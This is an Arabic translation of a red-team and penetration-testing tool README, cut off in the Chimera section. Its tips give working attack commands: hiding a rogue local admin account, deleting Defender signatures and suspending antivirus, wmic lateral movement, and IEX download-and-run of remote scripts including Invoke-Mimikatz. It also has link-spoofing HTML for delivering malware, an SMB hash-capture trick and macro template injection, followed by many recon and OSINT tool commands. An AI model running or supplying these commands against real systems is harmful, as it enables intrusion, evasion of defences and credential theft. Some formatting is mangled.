
أدوات وتقنيات للفريق الأحمر / اختبار الاختراق
يحتوي هذا المستودع على مجموعة من أكثر من 150 أداة ومورد يمكن أن تكون مفيدة لأنشطة الفريق الأحمر.
قد تكون بعض الأدوات مصممة خصيصًا للفريق الأحمر، بينما البعض الآخر عام ويمكن تكييفه لاستخدامه في سياق الفريق الأحمر.
🔗 إذا كنت من فريق الدفاع (Blue Teamer)، فاطلع على BlueTeam-Tools
تحذير
المواد الموجودة في هذا المستودع مخصصة للأغراض المعلوماتية والتعليمية فقط. وليست مخصصة للاستخدام في أي أنشطة غير قانونية.
ملاحظة
إخفاء عناوين قوائم الأدوات باستخدام السهم.
انقر على 🔙 للعودة إلى القائمة.
تعلم من أعضاء الفريق الأحمر من خلال مجموعة من نصائح الفريق الأحمر. تغطي هذه النصائح مجموعة من التكتيكات والأدوات والمنهجيات لتحسين قدراتك في الفريق الأحمر.
الوصف: 'أضاف Qakbot مستمع حدث لحركة الماوس إلى مرفق تهريب HTML لتجنب الاكتشاف في صندوق الحماية، ولن يتم إسقاط الملف المضغوط.'
المصدر: @pr0xylife
الرابط: تويتر
المصدر: @malmoeb
الرابط: تويتر
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**الوصف:** *'إنشاء الحسابات محفوف بالمخاطر عند التهرب من المراقبة الزرقاء، ولكن عند إنشاء مسؤول محلي، استخدم بعض السحر اللطيف في الريجستري لإخفائه.'*
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [تويتر](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)تعطيل ويندوز ديفندر عن طريق حذف التوقيعات```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
الوصف: 'فوضوي بعض الشيء، ولكن إذا كان Windows Defender يسبب لك صداعًا كبيرًا، بدلاً من تعطيله (الذي ينبه المستخدم)، يجب عليك فقط تحييده عن طريق حذف جميع التوقيعات.'
المصدر: @Alh4zr3d
الرابط: تويتر
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**الوصف:** *'في بعض الأحيان ترغب في تسجيل الدخول إلى مضيف عبر RDP أو ما شابه، لكن المستخدم لديه جلسة نشطة. قم بتمكين جلسات متعددة لكل مستخدم.'*
**الفضل:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)Sysinternals PsExec.exe بديل محلي```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
الوصف: "هل سئمت من رفع ملف Sysinternals PsExec.exe عند القيام بالحركة الجانبية؟ لدى Windows بديل أفضل مثبت مسبقًا. جرب هذا بدلاً من ذلك."
الفضل: @GuhnooPlusLinux
الرابط: تويتر
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**الوصف:** *'استفد من الأدوات الموجودة على الجهاز قدر الإمكان بدلاً من رفع أدوات جديدة إليه (لأسباب عديدة). PowerShell/.NET يساعدان. مثال: ماسح منافذ بسيط في Powershell.'*
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
الوصف: 'معظم المؤسسات الكبيرة تستخدم وكلاء ويب هذه الأيام. دالة تنزيل PowerShell القياسية لا تعمل مع الوكلاء. استخدم هذه.'
الائتمان: @Alh4zr3d
الرابط: تويتر
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**الوصف:** *'قد تتفاجأ مما يمكنك اكتشافه من إشارات المستخدم المرجعية وحدها. نقاط الوصول الداخلية التي يمكنه الوصول إليها، على سبيل المثال.'*
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)استعلام سجلات DNS للتعداد```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
الوصف: 'الاستكشاف هو 95٪ من اللعبة. لكن إطلاق العديد من الفحوصات لتقييم البيئة أمر مزعج للغاية. لماذا لا نطلب ببساطة من خادم DC/DNS جميع سجلات DNS؟'
المصدر: @Alh4zr3d
الرابط: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**الوصف:** *'العثور على مسارات الخدمة غير المقتبسة بدون PowerUp'*
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)تجاوز موجه الأوامر المعطل باستخدام /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
الوصف: 'تم تعطيل موجه الأوامر هذا بواسطة المسؤول...' يمكن رؤيته عادةً في بيئات مثل أجهزة الكشك، الحل البديل السريع هو استخدام /k عبر مربع تشغيل Windows. سينفذ هذا الأمر ثم يعرض رسالة التقييد، مما يسمح بتنفيذ الأوامر.
المصدر: Martin Sohn Christensen
الرابط: المدونة
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**الوصف:** *'هل سئمت من قيام Windows Defender بحذف mimikatz.exe؟ جرب هذا بدلاً من ذلك.'*
**الائتمان:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**الرابط:** [تويتر](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)تحقق مما إذا كنت في جهاز افتراضي```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
الوصف: 'تريد معرفة ما إذا كنت في جهاز افتراضي؟ استعلم عن مفاتيح التسجيل واكتشف!!! إذا ظهرت أي نتائج فأنت في جهاز افتراضي.'
الائتمان: @dmcxblue
الرابط: تويتر
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**الوصف:** *'يمكن أن يكون AppLocker مزعجًا. قم بالتعداد لترى مدى الألم.'*
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
### [🔙](#tool-list)اختصار CMD بـ 6 بكسلات عبر mspaint

1. افتح MSPaint.exe واضبط حجم اللوحة على: العرض=6 والارتفاع=1 بكسل
2. قم بتكبير الصورة لتسهيل المهام التالية
3. باستخدام منتقي الألوان، اضبط قيم البكسلات (من اليسار إلى اليمين):
- الأول: R: 10, G: 0, B: 0
- الثاني: R: 13, G: 10, B: 13
- الثالث: R: 100, G: 109, B: 99
- الرابع: R: 120, G: 101, B: 46
- الخامس: R: 0, G: 0, B: 101
- السادس: R: 0, G: 0, B: 0
4. احفظها كصورة نقطية 24 بت (*.bmp;*.dib)
5. غيّر امتدادها من bmp إلى bat وقم بتشغيلها.
**الوصف:** *'طريقة غير عادية لكنها فعالة للحصول على شيل عن طريق إنشاء اختصار لـ cmd.exe عبر رسم ألوان معينة في Microsoft Paint. بفضل خوارزمية الترميز المستخدمة في كتابة ملفات BMP، من الممكن التحكم في بيانات ASCII المكتوبة في ملف عن طريق اختيار ألوان RGB معينة بعناية.'*
**الائتمان:** [PenTestPartners](https://www.pentestpartners.com/)
**الرابط:** [المدونة](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)
### [🔙](#tool-list)انتحال الرابط باستخدام طريقة PreventDefault في JavaScript
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PreventDefault Example</title>
</head>
<body>
<a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
</body>
</html>
الوصف: تمت ملاحظة مهاجمين يستخدمون هذه التقنية لخداع الضحايا للنقر على روابط تحميل برمجيات خبيثة مزيفة داخل الصفحة. باستخدام طريقة PreventDefault في جافاسكريبت، يمكنك تزوير رابط التمرير لعرض رابط شرعي google.com، ولكن بمجرد النقر، سيتم إعادة توجيه الضحية إلى رابطك الخبيث bing.com. ممتاز لجعل الضحايا يقومون بتحميل الحمولات عبر موقع مسيطر عليه.
الرابط: PreventDefault Docs
```powershell
Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"
**الوصف:** *'عندما أجري تقييمًا للاختراق، غالبًا ما أطلب من العميل إذا كان بإمكاني إجراء فحص سريع أخير: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. إذا تمكن Responder من التقاط الهاش، فإن الجدار الناري يسمح باتصالات SMB الصادرة'*
**المصدر:** [@malmoeb](https://twitter.com/malmoeb)
**الرابط:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)
### [🔙](#tool-list)تعطيل مكافحة الفيروسات باستخدام SysInternals PsSuspend

**الوصف:** *باستخدام أداة Microsoft Sysinternals PsSuspend.exe، يمكن تعليق بعض عمليات خدمات مكافحة الفيروسات. يمكن تمرير PID أو اسم خدمة قيد التشغيل إلى الأداة الموقعة من Microsoft، حيث ستعلق العملية عبر واجهة برمجة تطبيقات NtSuspendProcess لنظام Windows.*
**منشور المدونة ذو الصلة:** [تجاوز مكافحة الفيروسات عبر تعليق العملية باستخدام PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)
**الرابط:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)
الاستطلاع
====================
### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)
SpiderFoot هي أداة أتمتة لجمع المعلومات مفتوحة المصدر (OSINT). تتكامل مع كل مصدر بيانات تقريبًا وتستخدم مجموعة من الأساليب لتحليل البيانات، مما يجعل التنقل في تلك البيانات أمرًا سهلاً.
يمكن استخدام SpiderFoot بشكل هجومي (على سبيل المثال، في تمرين الفريق الأحمر أو اختبار الاختراق) للاستطلاع عن هدفك، أو بشكل دفاعي لجمع معلومات حول ما قد تكون أنت أو مؤسستك قد كشفت عنه عبر الإنترنت.
**التثبيت:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt
للحصول على تعليمات التثبيت الكاملة، انظر هنا.
الاستخدام:```python python3 ./sf.py -l 127.0.0.1:5001
الكثير من فيديوهات تعليمية للاستخدام [هنا](https://asciinema.org/~spiderfoot)

*الصورة مأخوذة من https://github.com/smicallef/spiderfoot*
### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)
reconFTW يقوم بأتمتة عملية الاستطلاع بأكملها نيابةً عنك. يتفوق في عمل تعداد النطاقات الفرعية إلى جانب فحوصات الثغرات المختلفة والحصول على أقصى معلومات عن هدفك.
**التثبيت:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh
للحصول على تعليمات التثبيت الكاملة، انظر هنا.
الاستخدام:```bash
./reconftw.sh -d target.com -r
./reconftw.sh -m target -l domains.txt -r
./reconftw.sh -d target.com -p
./reconftw.sh -d target.com -a
للحصول على تعليمات الاستخدام الكاملة انظر [هنا](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

*الصورة مستخدمة من https://www.youtube.com/watch?v=TQmDAtkD1Wo*
### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)
أداة استيلاء على النطاقات الفرعية تعمل بناءً على مطابقة بصمات الاستجابة من [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).
**التثبيت:**```bash
go install -v github.com/PentestPad/subzy@latest
للاطلاع على تعليمات التثبيت الكاملة، انظر هنا.
الاستخدام:```bash
./subzy run --targets list.txt
./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

*صورة مستخدمة من https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*
### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)
تعداد مستخدمي SMTP عبر VRFY وEXPN وRCPT مع وظائف المهلة الزمنية الذكية وإعادة المحاولة وإعادة الاتصال.
**تثبيت:**```bash
pip install smtp-user-enum
الاستخدام:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

*الصورة مستخدمة من https://www.kali.org/tools/smtp-user-enum/*
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
لقد قمت بتجميع أمر bash من سطر واحد يقوم بـ:
- جمع قائمة من النطاقات الفرعية بشكل سلبي من شهادات الارتباط ([crt.sh](https://crt.sh/))
- طلب كل نطاق فرعي بشكل نشط للتحقق من وجوده ([httprobe](https://github.com/tomnomnom/httprobe))
- التقاط لقطة شاشة لكل نطاق فرعي بشكل نشط للمراجعة اليدوية ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**الاستخدام:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
ملاحظة: يجب أن يكون لديك httprobe وpup وEyeWitness مثبتة وتغيير 'DOMAIN_COM' إلى المجال الهدف. يمكنك تشغيل هذا السكريبت بشكل متزامن في نوافذ الطرفية إذا كان لديك عدة مجالات جذرية مستهدفة


إشارة مرجعية لجافا سكريبت لاستخراج جميع روابط نقاط النهاية لصفحة الويب على الصفحة.
تم إنشاؤه بواسطة @renniepak، يمكن استخدام مقتطف كود جافا سكريبت هذا لاستخراج جميع نقاط النهاية (التي تبدأ بـ /) من DOM صفحة الويب الحالية بما في ذلك جميع مصادر السكريبت الخارجية المضمنة في صفحة الويب.```javascript
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();
**الاستخدام (إشارة مرجعية)**
أنشئ إشارة مرجعية...
- `انقر بزر الماوس الأيمن على شريط الإشارات المرجعية`
- `انقر على 'إضافة صفحة'`
- `الصق JavaScript أعلاه في مربع 'url'`
- `انقر على 'حفظ'`
...ثم زر صفحة الضحية في المتصفح وانقر على الإشارة المرجعية.

**الاستخدام (وحدة التحكم)**
الصق JavaScript أعلاه في نافذة وحدة التحكم `F12` واضغط على Enter.

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
ماسح ضوئي سريع للثغرات يستخدم قوالب .yaml للبحث عن مشكلات محددة.
**التثبيت:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
الاستخدام:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff هي أداة مراقبة للكلمات المفتاحية في سجلات شهادات SSL (Certificate Transparency logs) كتبتها بلغة Python. تستخدم مكتبة certstream لمراقبة سجلات إنشاء الشهادات التي تحتوي على كلمات مفتاحية محددة في ملف.
يمكنك تشغيلها بعدة كلمات مفتاحية تتعلق بنطاق ضحيتك، وسيتم تسجيل أي إنشاءات للشهادات، مما قد يؤدي إلى اكتشاف نطاقات لم تكن على علم بها سابقًا.
**تثبيت:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
الاستخدام:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
أداة رائعة لتجريب مسارات الملفات/المجلدات على موقع ويب مستهدف.
**تثبيت:**```bash
sudo apt install gobuster
الاستخدام:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
أداة مصممة لتنفيذ التصفح القسري (Forced Browsing)، وهو هجوم يهدف إلى تعداد والوصول إلى الموارد التي لا تتم الإشارة إليها بواسطة تطبيق الويب، ولكنها لا تزال قابلة للوصول من قبل المهاجم.
يستخدم Feroxbuster القوة الغاشمة (brute force) مع قائمة كلمات للبحث عن محتوى غير مرتبط في الدلائل المستهدفة. قد تخزن هذه الموارد معلومات حساسة حول تطبيقات الويب والأنظمة التشغيلية، مثل كود المصدر، بيانات الاعتماد، عناوين الشبكة الداخلية، إلخ.
**التثبيت: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
تثبيت: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**التثبيت: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
للحصول على تعليمات التثبيت الكاملة، انظر هنا.
الاستخدام:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
يمكن العثور على أمثلة الاستخدام الكاملة [هنا](https://epi052.github.io/feroxbuster-docs/docs/examples/).

*الصورة مأخوذة من https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
أداة للعثور على البنية التحتية للشركة (الهدف)، والملفات، والتطبيقات على أفضل مزودي الخدمات السحابية (أمازون، جوجل، مايكروسوفت، ديجيتال أوشن، علي بابا، فولتر، لينود).
الميزات:
- اكتشاف السحابة (واجهة برمجة تطبيقات IPINFO وكود المصدر)
- سريع (متزامن)
- متعدد المنصات (ويندوز، لينكس، ماك)
- توزيع عشوائي لوكيل المستخدم
- توزيع عشوائي للوكيل (HTTP، Socks5)
**التثبيت:**
قم بتنزيل أحدث [إصدار](https://github.com/0xsha/CloudBrute/releases) لنظامك واتبع التعليمات الخاصة بالاستخدام.
**الاستخدام:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

الصورة مأخوذة من https://github.com/0xsha/CloudBrute
dnsrecon هي أداة بايثون لجرد سجلات DNS (MX, SOA, NS, A, AAAA, SPF و TXT) ويمكنها توفير عدد من المضيفين الضحايا المرتبطين الجدد للتنقل إليها من بحث نطاق واحد.
التثبيت:```bash sudo apt install dnsrecon
**الاستخدام:**```bash
dnsrecon -d google.com

يقوم Shodan بجرد البنية التحتية العامة وعرضها بتنسيق قابل للبحث. باستخدام اسم الشركة أو اسم النطاق أو عنوان IP، يمكن اكتشاف الأنظمة التي قد تكون ضعيفة والمرتبطة بهدفك عبر shodan.

أداة لتعداد النطاقات الفرعية، تعداد DNS، كشف جدار الحماية (WAF)، WHOIS، فحص المنافذ، Wayback Machine، جمع البريد الإلكتروني.
التثبيت:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**الاستخدام:**```python
python3 AORT.py -d google.com

برنامج يتحقق مما إذا كان النطاق يمكن تزوير مصدره. يفحص البرنامج سجلات SPF و DMARC بحثًا عن إعدادات ضعيفة تسمح بالتزوير. بالإضافة إلى ذلك، سينبه إذا كان النطاق يحتوي على إعداد DMARC يرسل بريدًا أو طلبات HTTP عند فشل رسائل SPF/DKIM.
النطاقات قابلة للتزوير إذا تحقق أي من الشروط التالية:
~all أو -allp=none أو غير موجودةالتثبيت:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**الاستخدام:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDump هي أداة لسرد دلائل S3 الخاصة بخدمة AWS بسرعة بحثًا عن الملفات المثيرة للاهتمام. تشبه أداة تخمين النطاقات الفرعية ولكنها مصممة خصيصًا لدلائل S3، وتحتوي أيضًا على ميزات إضافية تسمح لك بالبحث في الملفات باستخدام grep وتنزيل الملفات المثيرة للاهتمام.
تثبيت:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**الاستخدام:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
أداة رائعة للعثور على معلومات من GitHub باستخدام regex، مع إمكانية البحث عن مستخدمين و/أو مشاريع محددة على GitHub.
التثبيت:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**الاستخدام:**```
./githarvester.py
TruffleHog هي أداة تقوم بمسح مستودعات git والبحث عن سلاسل عالية الإنتروبيا وأنماط قد تشير إلى وجود أسرار، مثل كلمات المرور ومفاتيح API. باستخدام TruffleHog، يمكنك بسرعة وسهولة العثور على معلومات حساسة قد تم ارتكابها ودفعها بطريق الخطأ إلى مستودع.
التثبيت (ثنائيات): رابط
التثبيت (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**الاستخدام:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismap هي أداة لاكتشاف وتحديد الأصول. يمكنها التعرف بسرعة على البروتوكولات ومعلومات البصمات مثل web/tcp/udp، وتحديد أنواع الأصول، وهي مناسبة للشبكات الداخلية والخارجية.
تمتلك Dismap قاعدة بصمات كاملة، تتضمن حالياً بصمات بروتوكولات tcp/udp/tls وأكثر من 4500 قاعدة بصمة ويب، يمكنها التعرف على favicon و body و header وغيرها.
التثبيت:
Dismap هو ملف ثنائي لأنظمة Linux و MacOS و Windows. اذهب إلى Release لتنزيل الإصدار المناسب لتشغيله:```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**الاستخدام:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

الصورة مستخدمة من https://github.com/zhzyker/dismap
أداة لتعداد المعلومات من أنظمة Windows و Samba.
يمكن استخدامها لجمع مجموعة واسعة من المعلومات، بما في ذلك:
التثبيت: (Apt)```bash sudo apt install enum4linux
**التثبيت: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
الاستخدام:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
يمكن العثور على معلومات الاستخدام الكاملة في [هذه المدونة](https://labs.portcullis.co.uk/tools/enum4linux/).

*الصورة مأخوذة من https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
ماسح سريع وخطير لـ dns/الشبكة/المنافذ، من إنشاء [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc)، مكتوب بلغة rust.
ستحتاج إلى ملف نطاقات فرعية. *مثال: [قائمة كلمات النطاقات الفرعية من Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.
**التثبيت:**
قم بتنزيل أحدث إصدار من [هنا](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
الاستخدام:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

*الصورة مستخدمة من https://github.com/Esc4iCEscEsc/skanuvaty*
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigor هي أداة استخباراتية، هدفها القيام بمهام OSINT وأكثر ولكن بدون أي مفتاح API.
**الميزات الرئيسية:**
- البحث عن معلومات حول عنوان IP و ASN والمنظمة.
- غلاف (Wrapper) لتشغيل rustscan و masscan و nmap بكفاءة أكبر على IP/CIDR.
- إيجاد المزيد من المجالات المرتبطة بالهدف من خلال تطبيق تقنيات مختلفة (الشهادة، whois، Google Analytics، إلخ).
- الحصول على ملخص حول عنوان IP (مدعوم من [@thebl4ckturtle](https://github.com/theblackturtle))
**التثبيت:**```bash
go install github.com/j3ssie/metabigor@latest
الاستخدام:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

*الصورة مستخدمة من https://github.com/j3ssie/metabigor*
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob هي أداة تساعد في العثور على الملفات الحساسة المحتملة التي تم دفعها إلى المستودعات العامة على Github.
ستقوم Gitrob باستنساخ المستودعات التي تنتمي إلى مستخدم أو مؤسسة إلى عمق قابل للتكوين، وتتكرار عبر تاريخ الالتزامات ووضع علامات على الملفات التي تطابق التوقيعات الخاصة بالملفات الحساسة المحتملة.
سيتم عرض النتائج من خلال واجهة ويب لسهولة التصفح والتحليل.
**ملاحظة:** *ستحتاج Gitrob إلى رمز وصول Github للتفاعل مع واجهة برمجة تطبيقات Github. [أنشئ رمز وصول شخصي](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) واحفظه في متغير بيئة في ملف .bashrc أو ملف تهيئة شل مشابه:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
تثبيت: (Go)```bash go get github.com/michenriksen/gitrob
**تثبيت: (Binary)**
إصدار [مجمّع مسبقًا](https://github.com/michenriksen/gitrob/releases) متاح لكل إصدار.
**الاستخدام:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

الصورة مستخدمة من https://www.uedbox.com/post/58828/
Gowitness هي أداة لالتقاط لقطات شاشة لمواقع الويب مكتوبة بلغة Golang، تستخدم Chrome Headless لإنشاء لقطات شاشة لواجهات الويب من خلال سطر الأوامر، مع عارض تقارير مفيد لمعالجة النتائج. يتم دعم كل من Linux وmacOS، مع دعم Windows بشكل شبه كامل.
تثبيت: (Go)```bash go install github.com/sensepost/gowitness@latest
يمكن العثور على معلومات التثبيت الكاملة [هنا](https://github.com/sensepost/gowitness/wiki/Installation).
**الاستخدام:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
يمكن العثور على معلومات الاستخدام الكاملة هنا.

الصورة مستخدمة من https://github.com/sensepost/gowitness
يقوم بحقن رابط إلى قالب Word عن بعد في مستند Word.
هذه الأداة المبنية على بايثون تقوم بتعديل رابط settings.xml.rels في ملف .docx ليشير إلى قالب .dotm مستضاف عن بعد يحتوي على ماكرو VBA، ويتم تنفيذه عند فتح المستند وتفعيل وحدات الماكرو.
التثبيت:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector
**الاستخدام:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx
Chimera هو سكريبت تشفير PowerShell مصمم لتجاوز AMSI وحلول مكافحة الفيروسات. يقوم بتحليل ملفات PS1 الضارة المعروفة بإثارة برامج مكافحة الفيروسات ويستخدم استبدال السلاسل وربط المتغيرات لتجنب تواقيع الكشف الشائعة.
التثبيت:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**الاستخدام:**```bash
